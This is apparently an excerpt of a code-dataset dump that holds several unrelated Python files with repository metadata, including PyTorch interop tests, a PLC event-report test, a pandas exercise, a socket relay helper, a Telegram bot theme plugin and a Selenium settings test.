2, 3], [4, 5, 6]]\n ta = func(t)\n tn = np_func(t)\n\n assert not isinstance(ta, w.ndarray)\n assert ta == tn\n\n @parametrize(\"func, np_func\", one_arg_scalar_funcs)\n def test_toscalar_array(self, func, np_func):\n t = w.asarray([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n tn = np_func(t)\n\n assert not isinstance(ta, w.ndarray)\n assert ta == tn\n\n\nshape_funcs = [w.zeros, w.empty, w.ones, functools.partial(w.full, fill_value=42)]\n\n\n@instantiate_parametrized_tests\nclass TestShapeLikeToArray(TestCase):\n \"\"\"Smoke test (shape_like) -> 
array.\"\"\"\n\n shape = (3, 4)\n\n @parametrize(\"func\", shape_funcs)\n def test_shape(self, func):\n a = func(self.shape)\n\n assert isinstance(a, w.ndarray)\n assert a.shape == self.shape\n\n\nseq_funcs = [w.atleast_1d, w.atleast_2d, w.atleast_3d, w.broadcast_arrays]\n\n\n@instantiate_parametrized_tests\nclass TestSequenceOfArrays(TestCase):\n \"\"\"Smoke test (sequence of arrays) -> (sequence of arrays).\"\"\"\n\n @parametrize(\"func\", seq_funcs)\n def test_single_tensor(self, func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n\n # for a single argument, broadcast_arrays returns a tuple, while\n # atleast_?d return an array\n unpack = {w.broadcast_arrays: True}.get(func, False)\n res = ta[0] if unpack else ta\n\n assert isinstance(res, w.ndarray)\n\n @parametrize(\"func\", seq_funcs)\n def test_single_list(self, func):\n lst = [[1, 2, 3], [4, 5, 6]]\n la = func(lst)\n\n unpack = {w.broadcast_arrays: True}.get(func, False)\n res = la[0] if unpack else la\n\n assert isinstance(res, w.ndarray)\n\n @parametrize(\"func\", seq_funcs)\n def test_single_array(self, func):\n a = w.asarray([[1, 2, 3], [4, 5, 6]])\n la = func(a)\n\n unpack = {w.broadcast_arrays: True}.get(func, False)\n res = la[0] if unpack else la\n\n assert isinstance(res, w.ndarray)\n\n @parametrize(\"func\", seq_funcs)\n def test_several(self, func):\n arys = (\n torch.Tensor([[1, 2, 3], [4, 5, 6]]),\n w.asarray([[1, 2, 3], [4, 5, 6]]),\n [[1, 2, 3], [4, 5, 6]],\n )\n\n result = func(*arys)\n assert isinstance(result, (tuple, list))\n assert len(result) == len(arys)\n assert all(isinstance(_, w.ndarray) for _ in result)\n\n\nseq_to_single_funcs = [\n w.concatenate,\n w.stack,\n w.vstack,\n w.hstack,\n w.dstack,\n w.column_stack,\n w.row_stack,\n]\n\n\n@instantiate_parametrized_tests\nclass TestSequenceOfArraysToSingle(TestCase):\n \"\"\"Smoke test (sequence of arrays) -> (array).\"\"\"\n\n @parametrize(\"func\", seq_to_single_funcs)\n def test_several(self, func):\n arys = (\n torch.Tensor([[1, 2, 3], [4, 5, 6]]),\n w.asarray([[1, 2, 3], [4, 5, 6]]),\n [[1, 2, 3], [4, 5, 6]],\n )\n\n result = func(arys)\n assert isinstance(result, w.ndarray)\n\n\nsingle_to_seq_funcs = (\n w.nonzero,\n # https://github.com/Quansight-Labs/numpy_pytorch_interop/pull/121#discussion_r1172824545\n # w.tril_indices_from,\n # w.triu_indices_from,\n w.where,\n)\n\n\n@instantiate_parametrized_tests\nclass TestArrayToSequence(TestCase):\n \"\"\"Smoke test array -> (tuple of arrays).\"\"\"\n\n @parametrize(\"func\", single_to_seq_funcs)\n def test_asarray_tensor(self, func):\n t = torch.Tensor([[1, 2, 3], [4, 5, 6]])\n ta = func(t)\n\n assert isinstance(ta, tuple)\n assert all(isinstance(x, w.ndarray) for x in ta)\n\n @parametrize(\"func\", single_to_seq_funcs)\n def test_asarray_list(self, func):\n lst = [[1, 2, 3], [4, 5, 6]]\n la = func(lst)\n\n assert isinstance(la, tuple)\n assert all(isinstance(x, w.ndarray) for x in la)\n\n @parametrize(\"func\", single_to_seq_funcs)\n def test_asarray_array(self, func):\n a = w.asarray([[1, 2, 3], [4, 5, 6]])\n la = func(a)\n\n assert isinstance(la, tuple)\n assert all(isinstance(x, w.ndarray) for x in la)\n\n\nfuncs_and_args = [\n (w.linspace, (0, 10, 11)),\n (w.logspace, (1, 2, 5)),\n (w.logspace, (1, 2, 5, 11)),\n (w.geomspace, (1, 1000, 5, 11)),\n (w.eye, (5, 6)),\n (w.identity, (3,)),\n (w.arange, (5,)),\n (w.arange, (5, 8)),\n (w.arange, (5, 8, 0.5)),\n (w.tri, (3, 3, -1)),\n]\n\n\n@instantiate_parametrized_tests\nclass TestPythonArgsToArray(TestCase):\n \"\"\"Smoke_test (sequence of 
scalars) -> (array)\"\"\"\n\n @parametrize(\"func, args\", funcs_and_args)\n def test_argstoarray_simple(self, func, args):\n a = func(*args)\n assert isinstance(a, w.ndarray)\n\n\nclass TestNormalizations(TestCase):\n \"\"\"Smoke test generic problems with normalizations.\"\"\"\n\n def test_unknown_args(self):\n # Check that unknown args to decorated functions fail\n a = w.arange(7) % 2 == 0\n\n # unknown positional args\n with assert_raises(TypeError):\n w.nonzero(a, \"kaboom\")\n\n # unknown kwarg\n with assert_raises(TypeError):\n w.nonzero(a, oops=\"ouch\")\n\n def test_too_few_args_positional(self):\n with assert_raises(TypeError):\n w.nonzero()\n\n def test_unknown_args_with_defaults(self):\n # check a function 5 arguments and 4 defaults: this should work\n w.eye(3)\n\n # five arguments, four defaults: this should fail\n with assert_raises(TypeError):\n w.eye()\n\n\nclass TestCopyTo(TestCase):\n def test_copyto_basic(self):\n dst = w.empty(4)\n src = w.arange(4)\n w.copyto(dst, src)\n assert (dst == src).all()\n\n def test_copytobcast(self):\n dst = w.empty((4, 2))\n src = w.arange(4)\n\n # cannot broadcast => error out\n with assert_raises(RuntimeError):\n w.copyto(dst, src)\n\n # broadcast src against dst\n dst = w.empty((2, 4))\n w.copyto(dst, src)\n assert (dst == src).all()\n\n def test_copyto_typecast(self):\n dst = w.empty(4, dtype=int)\n src = w.arange(4, dtype=float)\n\n with assert_raises(TypeError):\n w.copyto(dst, src, casting=\"no\")\n\n # force the type cast\n w.copyto(dst, src, casting=\"unsafe\")\n assert (dst == src).all()\n\n\nclass TestDivmod(TestCase):\n def test_divmod_out(self):\n x1 = w.arange(8, 15)\n x2 = w.arange(4, 11)\n\n out = (w.empty_like(x1), w.empty_like(x1))\n\n quot, rem = w.divmod(x1, x2, out=out)\n\n assert_equal(quot, x1 // x2)\n assert_equal(rem, x1 % x2)\n\n out1, out2 = out\n assert quot is out[0]\n assert rem is out[1]\n\n def test_divmod_out_list(self):\n x1 = [4, 5, 6]\n x2 = [2, 1, 2]\n\n out = (w.empty_like(x1), w.empty_like(x1))\n\n quot, rem = w.divmod(x1, x2, out=out)\n\n assert quot is out[0]\n assert rem is out[1]\n\n @xfail # (\"out1, out2 not implemented\")\n def test_divmod_pos_only(self):\n x1 = [4, 5, 6]\n x2 = [2, 1, 2]\n\n out1, out2 = w.empty_like(x1), w.empty_like(x1)\n\n quot, rem = w.divmod(x1, x2, out1, out2)\n\n assert quot is out1\n assert rem is out2\n\n def test_divmod_no_out(self):\n # check that the out= machinery handles no out at all\n x1 = w.array([4, 5, 6])\n x2 = w.array([2, 1, 2])\n quot, rem = w.divmod(x1, x2)\n\n assert_equal(quot, x1 // x2)\n assert_equal(rem, x1 % x2)\n\n def test_divmod_out_both_pos_and_kw(self):\n o = w.empty(1)\n with assert_raises(TypeError):\n w.divmod(1, 2, o, o, out=(o, o))\n\n\nclass TestSmokeNotImpl(TestCase):\n def test_nimpl_basic(self):\n # smoke test that the \"NotImplemented\" annotation is picked up\n with assert_raises(NotImplementedError):\n w.empty(3, like=\"ooops\")\n\n\n@instantiate_parametrized_tests\nclass TestDefaultDtype(TestCase):\n def test_defaultdtype_defaults(self):\n # by default, both floats and ints 64 bit\n x = w.empty(3)\n z = x + 1j * x\n\n assert x.dtype.torch_dtype == torch.float64\n assert z.dtype.torch_dtype == torch.complex128\n\n assert w.arange(3).dtype.torch_dtype == torch.int64\n\n @parametrize(\"dt\", [\"pytorch\", \"float32\", torch.float32])\n def test_set_default_float(self, dt):\n try:\n w.set_default_dtype(fp_dtype=dt)\n\n x = w.empty(3)\n z = x + 1j * x\n\n assert x.dtype.torch_dtype == torch.float32\n assert z.dtype.torch_dtype == 
torch.complex64\n\n        finally:\n            # restore the default dtype\n            w.set_default_dtype(fp_dtype=\"numpy\")\n\n\n@skip(_np.__version__ <= \"1.23\", reason=\"from_dlpack is new in NumPy 1.23\")\nclass TestExport(TestCase):\n    def test_exported_objects(self):\n        exported_fns = (\n            x\n            for x in dir(w)\n            if inspect.isfunction(getattr(w, x))\n            and not x.startswith(\"_\")\n            and x != \"set_default_dtype\"\n        )\n        diff = set(exported_fns).difference(set(dir(_np)))\n        assert len(diff) == 0, str(diff)\n\n\nclass TestCtorNested(TestCase):\n    def test_arrays_in_lists(self):\n        lst = [[1, 2], [3, w.array(4)]]\n        assert_equal(w.asarray(lst), [[1, 2], [3, 4]])\n\n\nclass TestMisc(TestCase):\n    def test_ndarrays_to_tensors(self):\n        out = _util.ndarrays_to_tensors(((w.asarray(42), 7), 3))\n        assert len(out) == 2\n        assert isinstance(out[0], tuple) and len(out[0]) == 2\n        assert isinstance(out[0][0], torch.Tensor)\n\n    @skip(not TEST_CUDA, reason=\"requires cuda\")\n    def test_f16_on_cuda(self):\n        # make sure operations with float16 tensors give same results on CUDA and on CPU\n        t = torch.arange(5, dtype=torch.float16)\n        assert_allclose(w.vdot(t.cuda(), t.cuda()), w.vdot(t, t))\n        assert_allclose(w.inner(t.cuda(), t.cuda()), w.inner(t, t))\n        assert_allclose(w.matmul(t.cuda(), t.cuda()), w.matmul(t, t))\n        assert_allclose(w.einsum(\"i,i\", t.cuda(), t.cuda()), w.einsum(\"i,i\", t, t))\n\n        assert_allclose(w.mean(t.cuda()), w.mean(t))\n\n        assert_allclose(w.cov(t.cuda(), t.cuda()), w.cov(t, t).tensor.cuda())\n        assert_allclose(w.corrcoef(t.cuda()), w.corrcoef(t).tensor.cuda())\n\n\nif __name__ == \"__main__\":\n    run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/torch_np/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":17010,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"}
{"seq_id":"40994418220","text":"# -- coding: utf-8 --\n# CCO active meter-reading test via the concentrator\nimport robot\nimport plc_tb_ctrl\nimport concentrator\nimport tc_common\nimport tc_4_1\nimport time\nimport config\n'''\n4.8 Active event reporting test\nWith multiple STA sites, verify the accuracy and efficiency of active event reporting when fault events occur on the meter side\n'''\n\n\ndef run(tb, band):\n    \"\"\"\n    Args:\n        tb (plc_tb_ctrl.PlcSystemTestbench): testbench object.\n    \"\"\"\n    assert isinstance(tb, plc_tb_ctrl.PlcSystemTestbench), \"tb type is not plc_tb_ctrl.PlcSystemTestbench\"\n    assert isinstance(tb.cct, concentrator.Concentrator), \"tb.cct type is not concentrator\"\n\n    addListFile = u'./tc/tc_iot_4/addrlist/互操作性表架拓扑地址_事件上报.txt'\n\n    plc_tb_ctrl._debug(\"step1: switch band if needed, wait for net working\")\n    tc_4_1.run(tb, band, False)\n    plc_tb_ctrl._debug(\"wait 120s start event_report\")\n    time.sleep(60)\n    tc_common.set_event_report(tb.cct, 1)\n    time.sleep(60)\n    # Confirm the CCO is active; the confirmation resets channels 1 and 3,\n    # so the meters on the rack power up again and the modules read the events.\n    tc_common.wait_cco_power_on(tb, tb.cct, 1, 3)\n    # Set the master node address\n    tb.cct.mac_addr = '00-00-00-00-00-9C'\n    plc_tb_ctrl._debug(\"set CCO addr={}\".format(tb.cct.mac_addr))\n    tc_common.set_cco_mac_addr(tb.cct, tb.cct.mac_addr)\n    # Clear the CCO parameter area\n    plc_tb_ctrl._debug(\"reset CCO param area\")\n    tc_common.reset_cco_param_area(tb.cct)\n    # Add the sub nodes\n    plc_tb_ctrl._debug(\"set sub node address to main cco, and start the main net\")\n    nw_top_main, sec_nodes_addr_list = tc_common.read_node_top_list(config.IOT_TOP_LIST_ALL, tb.cct.mac_addr, False)\n    tc_common.add_sub_node_addr(tb.cct, sec_nodes_addr_list)\n    # Read the address list for event reporting\n    top, nodelist = tc_common.read_node_top_list(addListFile, log=True)\n    for i in range(len(nodelist)):\n        nodelist[i] = nodelist[i].replace('-','')\n    plc_tb_ctrl._debug(nodelist)\n    # Compute the end time\n    
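# Poll for AFN=0x06 event-report frames, removing each reporting meter from nodelist, until the list is empty or the deadline passes\n    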
stoptime = time.time() + 2000\r\n    # 1000 s to wait for network formation and event reporting; this duration is not the same as the CEPRI (China Electric Power Research Institute) value\r\n    while stoptime - time.time() > 0:\r\n        frame1376p2 = tb.cct.wait_for_gdw1376p2_frame(afn=0x06, dt1=16, dt2=0, timeout=(stoptime - time.time()),\r\n                                                      tm_assert=False)\r\n        if frame1376p2 is not None:\r\n            frame645 = frame1376p2.user_data.value.data.data\r\n            tc_common.send_gdw1376p2_ack(tb.cct, frame1376p2.user_data.value.r.sn)\r\n            addrTmp = frame645.data[-24: -30: -1]\r\n            # \"\".join(\"{:02x}\".format(x) for x in addrTmp)\r\n            addr = \"\".join(\"%02x\" % x for x in addrTmp)\r\n            for a in nodelist:\r\n                if a == addr:\r\n                    nodelist.remove(a)\r\n            plc_tb_ctrl._debug(addr)\r\n        if nodelist.__len__() == 0:\r\n            break\r\n    if nodelist.__len__() != 0:\r\n        s = ''\r\n        for n in nodelist:\r\n            s += n + \"; \"\r\n        plc_tb_ctrl._debug(\"these meters did not report an event: \" + s)\r\n\r\n    assert nodelist.__len__() == 0, \"some meters still did not report their events\"\r\n","repo_name":"siwaveliu/PLC_SYSTEM_TEST","sub_path":"tc/tc_iot_4/tc_4_8.py","file_name":"tc_4_8.py","file_ext":"py","file_size_in_byte":3113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"17455965952","text":"'''\nGrouping by multiple columns\n\nIn this exercise, you will return to working with the Titanic dataset from Chapter 1 and use .groupby() to analyze the distribution of passengers who boarded the Titanic.\n\nThe 'pclass' column identifies which class of ticket was purchased by the passenger and the 'embarked' column indicates at which of the three ports the passenger boarded the Titanic. 'S' stands for Southampton, England, 'C' for Cherbourg, France and 'Q' for Queenstown, Ireland.\n\nYour job is to first group by the 'pclass' column and count the number of rows in each class using the 'survived' column. You will then group by the 'embarked' and 'pclass' columns and count the number of passengers.\n\nThe DataFrame has been pre-loaded as titanic.\n'''\n\nimport pandas as pd\n\ntitanic = pd.read_csv('../datasets/titanic.csv')\n\n'''\nINSTRUCTIONS\n\n* Group by the 'pclass' column and save the result as by_class.\n* Aggregate the 'survived' column of by_class using .count(). Save the result as count_by_class.\n* Print count_by_class. This has been done for you.\n* Group titanic by the 'embarked' and 'pclass' columns. Save the result as by_mult.\n* Aggregate the 'survived' column of by_mult using .count(). Save the result as count_mult.\n* Print count_mult. 
This has been done for you, so hit 'Submit Answer' to view the result.\n'''\n\n# Group titanic by 'pclass'\nby_class = titanic.groupby('pclass')\n\n# Aggregate 'survived' column of by_class by count\ncount_by_class = by_class['survived'].count()\n\n# Print count_by_class\nprint(count_by_class)\n\n# Group titanic by 'embarked' and 'pclass'\nby_mult = titanic.groupby(['embarked', 'pclass'])\n\n# Aggregate 'survived' column of by_mult by count\ncount_mult = by_mult['survived'].count()\n\n# Print count_mult\nprint(count_mult)\n\n'''\n> titanic.info()\n\nRangeIndex: 1309 entries, 0 to 1308\nData columns (total 14 columns):\npclass 1309 non-null int64\nsurvived 1309 non-null int64\nname 1309 non-null object\nsex 1309 non-null object\nage 1046 non-null float64\nsibsp 1309 non-null int64\nparch 1309 non-null int64\nticket 1309 non-null object\nfare 1308 non-null float64\ncabin 295 non-null object\nembarked 1307 non-null object\nboat 486 non-null object\nbody 121 non-null float64\nhome.dest 745 non-null object\ndtypes: float64(3), int64(4), object(7)\nmemory usage: 143.2+ KB\n\n> count_by_class\npclass\n1 323\n2 277\n3 709\nName: survived, dtype: int64\n\n> count_mult\nembarked pclass\nC 1 141\n 2 28\n 3 101\nQ 1 3\n 2 7\n 3 113\nS 1 177\n 2 242\n 3 495\nName: survived, dtype: int64\n'''","repo_name":"sashakrasnov/datacamp","sub_path":"09-manipulating-dataframes-with-pandas/4-grouping-data/01-grouping-by-multiple-columns.py","file_name":"01-grouping-by-multiple-columns.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
{"seq_id":"42757777958","text":"from pydantic import BaseModel,Field\nfrom typing import Optional\n\nclass Movie(BaseModel):\n    id: Optional[int]\n    movie_title:str = Field( max_length=500)\n    overview:str = Field( max_length=500)\n    year:int = Field(le=2022)\n    rating:float = Field(le=10,ge=0)\n    category:str = Field(max_length=50)\n\n    class Config:\n        schema_extra = {\n            \"example\":{\n                'id':1,\n                \"movie_title\":\"Mi peliculacxvcx\",\n                \"overview\":\"Descripcion mivieasdf\",\n                \"year\":2022,\n                \"rating\":0,\n                \"category\":\"sdjk\"\n            }\n        }","repo_name":"jcastaneda30/deploy-prueba","sub_path":"schemas/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4418275886","text":"def lines(file):\n    for line in file:\n        yield line\n    yield '\\n'\n\n\ndef blocks(file):\n    block = []\n    for line in lines(file):\n        if line.strip(): # strip() removes the trailing newline\n            block.append(line) # if the line has content, add it to the block\n        elif block:\n            yield ''.join(block).strip()\n            block = []\n","repo_name":"sxy370921/Automatically-add-HTML-tags","sub_path":"HTML_LABALS/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"14727351008","text":"\n## Baekjoon solution template\n# Input format: https://daebaq27.tistory.com/57\n\nimport sys\n\n# Case where the first line gives two numbers (e.g. 7, 9) and the second one determines how many input lines follow\nn,m = map(int, sys.stdin.readline().split())\narr = [list(map(int, sys.stdin.readline().split())) for _ in range(m)]\n\nn,m = map(int, input().split()) # the first value is assigned to n, the second to m.\narr = []\n\nfor _ in range(m): # loop m times, appending each input line to arr\n    arr.append(list(map(int, input().split())))\n\n# An iterable object\nitem = [\"First\", \"Second\", \"Third\"]\nfor i, val in enumerate(item):\n    print(\"{} 번쨰 값은 {}입니다\".format(i, val))\n# 0 번쨰 값은 First입니다\n# 1 번쨰 값은 
Second입니다\n# 2 번쨰 값은 Third입니다\n\nanswer.add(''.join(result))","repo_name":"sunnyineverywhere/algorithm","sub_path":"yhjune/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":810,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40541796220","text":"from __future__ import print_function\nimport random\nfrom os import listdir\nimport glob\n\nimport numpy as np\nfrom scipy import misc\nimport tensorflow as tf\nimport h5py\n\n#from keras.datasets import mnist\n#from keras.utils import np_utils\n\nimport matplotlib.pyplot as plt\n\n#Setting the random seed so that the results are reproducible.\nrandom.seed(101)\n\n#Setting variables for MNIST image dimensions\nmnist_image_height = 8\nmnist_image_width = 8\nfrom sklearn.datasets import load_digits\nfrom sklearn import preprocessing\nfrom sklearn.cross_validation import KFold\nfrom sklearn.model_selection import train_test_split\ndigits = load_digits()\nX = digits[\"data\"]\ny = digits[\"target\"]\n#X = preprocessing.scale(X)\nn_samples = X.shape[0]\nX_new = np.zeros((n_samples,8,8))\nfor i in range(n_samples):\n X_new[i, :, :] = np.reshape(X[i, :] ,(8 ,8))\n\n#kf = KFold(n_splits=5)\nX_train, X_test, y_train, y_test = train_test_split(X_new, y ,test_size=0.2, stratify=y)\n\n#Import MNIST data from keras\n#X_train, X_test, y_train, y_test = train_test_split(digits.data, digits.target)\n#print(X_train.shape)\n#print(y_train.shape) # load data from sklearn\n#(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nclass synthGroup(object):\n def __init__(self, num_sample, num_classes, ratio):# the total number of samples, the number of the classes, the unbalanced ratio between classes\n self.num_sample = num_sample\n self.num_classes = num_classes\n self.ratio = ratio\n\n def seperate_digits(self,samples, y, labels, label):\n num_samples = samples.shape[0]\n synth_indices = []\n\n for j in range(num_samples):\n if y[j] == label:\n synth_indices.append(j)\n num_target = len(synth_indices)\n indice_chosen = np.random.randint(0,num_target,1)\n synth_indices = np.array(synth_indices)\n return synth_indices[indice_chosen]\n\n def generate_group(self,num_samples, labels, c): # the number of this group, the labels of the original digit images, the class number of the newly generated group\n synth_labels = []\n\n # Define synthetic data\n synth_data = np.ndarray(shape=(num_samples, mnist_image_height, mnist_image_width),\n dtype=np.float32)\n num_labels = len(labels)\n digit_indices= np.random.randint(0,num_labels, num_samples)\n sub_label = np.ndarray(shape=(num_samples,1),dtype=np.float32)\n num_digits = []\n for i in range(num_samples):\n\n indice_temp = digit_indices[i]\n num_digits.append(labels[indice_temp])\n\n for j in range(num_samples):\n label_temp = num_digits[j]\n synth_indice = self.seperate_digits(X_train, y_train, labels ,label_temp)\n synth_data[j, :, :] = X_train[synth_indice, :, :]\n synth_labels.append(c)\n sub_label[j] = y_train[synth_indice]\n return synth_data, synth_labels, sub_label\n\n\n","repo_name":"zzUMN/svmPlus","sub_path":"synth_group.py","file_name":"synth_group.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"19049543481","text":"# -*- coding: utf-8 -*-\n\nfrom sqlalchemy.orm import Session\n\nfrom forms.user import UserForm\nfrom models.user import User\nfrom repositories.user import UserRepository\n\n\nclass UserService:\n def 
__init__(self) -> None:\n self.repository = UserRepository\n\n def create(\n self,\n session: Session,\n item: UserForm,\n ) -> User:\n repo = self.repository(session)\n return repo.create(item=item)\n\n def get(\n self,\n session: Session,\n email: str,\n ) -> User:\n repo = self.repository(session)\n return repo.get(reference=email)\n","repo_name":"cristhianclx/logs","sub_path":"app/services/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"4784040477","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# spvm setup.py\n\nimport io\nimport os\nimport json\nfrom setuptools import find_packages, setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\nmetaFileName = \"pyp.json\"\n\n# Import the package meta data\nwith open(os.path.join(here, metaFileName)) as pmfile:\n meta = json.loads(pmfile.read())\n\n# Use the README.md as the Long description\nwith io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:\n long_description = '\\n' + f.read()\n\nsetup(\n name=meta['project_info']['name'],\n version=meta['project_vcs']['version'],\n description=meta['project_info']['description'],\n long_description=long_description,\n long_description_content_type='text/markdown',\n author=meta['project_authors'][0]['name'],\n author_email=meta['project_authors'][0]['email'],\n python_requires=meta['project_requirements']['python_version'],\n url=meta['project_info']['url'],\n packages=find_packages(exclude=meta['project_vcs']['exclude_packages']),\n\n install_requires=meta['project_requirements']['python_packages'],\n include_package_data=True,\n license=meta['project_info']['license']\n)\n","repo_name":"yliess86/LPCTorch","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"72"} +{"seq_id":"20197003414","text":"from typing import Dict, List, Union\n\nfrom pyrogram import Client, filters\n\nfrom Alexa import BOT_USERNAME, MUSIC_BOT_NAME, app, db\nfrom Alexa.Database import _get_theme, get_theme, save_theme\n\nthemes = [\n \"blue\",\n \"black\",\n \"red\",\n \"green\",\n \"grey\",\n \"orange\",\n \"pink\",\n \"yellow\",\n \"Random\",\n]\n\nthemes2 = [\n \"blue\",\n \"black\",\n \"red\",\n \"green\",\n \"grey\",\n \"orange\",\n \"pink\",\n \"yellow\",\n]\n\n__MODULE__ = \"🎢 ᴛʜᴇᴍᴇ\"\n__HELP__ = \"\"\"\n\n\n`/settheme`\n- sᴇᴛ ᴀ ᴛʜᴇᴍᴇ ғᴏʀ ᴛʜᴜᴍʙɴᴀɪʟs.\n\n`/theme`\n- ᴄʜᴇᴄᴋ ᴛʜᴇᴍᴇ ғᴏʀ ʏᴏᴜʀ ᴄʜᴀᴛ.\n\n- ᴘᴏᴡᴇʀᴅ ʙʏ 😍 ʀᴏᴄᴋs ᴀɴᴅ @AsadSupport.\n\"\"\"\n\n\n@app.on_message(\n filters.command([\"settheme\", f\"settheme@{BOT_USERNAME}\"]) & filters.group\n)\nasync def settheme(_, message):\n usage = f\"ᴛʜɪs ɪsɴ'ᴛ ᴀ ᴛʜᴇᴍᴇ...\\n\\nsᴇʟᴇᴄᴛ ғʀᴏᴍ ᴛʜᴇᴍ\\n{' | '.join(themes)}\\n\\nᴜsᴇ 'Random' ᴛᴏ ɢᴇᴛ ʀᴀɴᴅᴏᴍ ᴄʜᴏɪᴄᴇ ᴏғ ᴛʜᴇᴍᴇs\"\n if len(message.command) != 2:\n return await message.reply_text(usage)\n theme = message.text.split(None, 1)[1].strip()\n if theme not in themes:\n return await message.reply_text(usage)\n note = {\n \"theme\": theme,\n }\n await save_theme(message.chat.id, \"theme\", note)\n await message.reply_text(f\"ᴄʜᴀɴɢᴇᴅ ᴛʜᴜᴍʙɴᴀɪʟ ᴛʜᴇᴍᴇ ᴛᴏ {theme}\")\n\n\n@app.on_message(filters.command(\"theme\"))\nasync def theme_func(_, message):\n await message.delete()\n _note = await get_theme(message.chat.id, \"theme\")\n if not _note:\n theme = \"Random\"\n else:\n theme = _note[\"theme\"]\n await message.reply_text(\n f\"**{MUSIC_BOT_NAME} ᴛʜᴜᴍʙɴᴀɪʟs 
ᴛʜᴇᴍᴇ**\\n\\n**ᴄᴜʀʀᴇɴᴛ ᴛʜᴇᴍᴇ:-** {theme}\\n\\n**ᴀᴠᴀɪʟᴀʙʟᴇ ᴛʜᴇᴍᴇs:-** {' | '.join(themes2)} \\n\\nᴜsᴇ /settheme ᴛᴏ ᴄʜᴀɴɢᴇ ᴛʜᴇᴍᴇ...\"\n )\n","repo_name":"TheTeamAlexa/AlexaTGMusic","sub_path":"Alexa/Plugins/Theme.py","file_name":"Theme.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"14751558502","text":"import socket\nimport struct\nimport select\nimport errno\n\n\ndef relay(isock, osock):\n sd, sr, sw = 0, 1, 2\n ioctx = [isock, osock, sr, b'']\n oictx = [osock, isock, sr, b'']\n while ioctx[2] != sd or oictx[2] != sd:\n rfds, wfds = [], []\n for ctx in (ioctx, oictx):\n if ctx[2] == sr:\n rfds.append(ctx[0])\n elif ctx[2] == sw:\n wfds.append(ctx[1])\n rfds, wfds, _ = select.select(rfds, wfds, [])\n for ctx in (ioctx, oictx):\n if ctx[2] == sr and ctx[0] in rfds:\n buf = ctx[0].recv(4096, socket.MSG_DONTWAIT)\n if len(buf) == 0:\n ctx[2] = sd\n ctx[1].shutdown(socket.SHUT_WR)\n else:\n ctx[2] = sw\n ctx[3] = buf\n elif ctx[2] == sw and ctx[1] in wfds:\n try:\n wlen = ctx[1].send \\\n (ctx[3], socket.MSG_DONTWAIT | socket.MSG_NOSIGNAL)\n if wlen == len(ctx[3]):\n ctx[2] = sr\n ctx[3] = b''\n else:\n ctx[3] = ctx[3][wlen:]\n except OSError as e:\n if e.errno == errno.EPIPE:\n isock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,\n struct.pack('@ii', 1, 0))\n osock.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,\n struct.pack('@ii', 1, 0))\n ioctx[2], oictx[2] = sd, sd\n else:\n raise e\n","repo_name":"vhqr0/tomato_archive","sub_path":"tomato.1.cpp/py/relay.py","file_name":"relay.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22592287109","text":"from transitions import Machine \n\nclass GameState():\n STATES = ['moving', 'attacking', 'idle']\n\n def __init__(self):\n\n transitions = [\n {'trigger': 'stop', \"source\": \"*\", \"dest\": \"idle\"},\n {\"trigger\": \"walk\", \"source\": \"idle\", \"dest\": \"moving\"},\n {\"trigger\": \"fight\", \"source\": \"idle\", \"dest\": \"attacking\"}\n ]\n\n self.machine = Machine(model=self, states=GameState.STATES, initial=\"idle\", transitions=transitions)\n\n def __str__(self):\n return self.state","repo_name":"hamletrpg/Grid-Based-Battle-System","sub_path":"State.py","file_name":"State.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"22208480418","text":"import time\n\nfrom selenium.webdriver import Keys\nfrom selenium.webdriver.common.by import By\nfrom utilities.BaseClass import BaseClass\nclass TestCompanyStructure(BaseClass):\n def test_companystructure(self):\n self.LoginProcessMethod()\n self.driver.find_element(By.CLASS_NAME, 'settings-header').click()\n # SETTINGS PAGE VALIDATION\n clientsettings = self.driver.find_element(By.CLASS_NAME, 'settings__menu').text\n assert (\"Settings\" in clientsettings)\n print(\"---Settings Page---\")\n # COMPANY STRUCTURE TAB\n self.driver.execute_script('arguments[0].click()',\n self.driver.find_element(By.XPATH, '/html/body/app-root/div/app-client/div[1]/div[2]/div/app-settings/div/div/aside/ul/li[4]/a'))\n print(\"--COMPANY STRUCTURE TAB\")\n # ADD NEW DEPARTMENT\n self.driver.find_element(By.CLASS_NAME, \"set_new_department\").click()\n self.driver.find_element(By.CLASS_NAME, \"set_new_department\").send_keys(\"Department Test\")\n 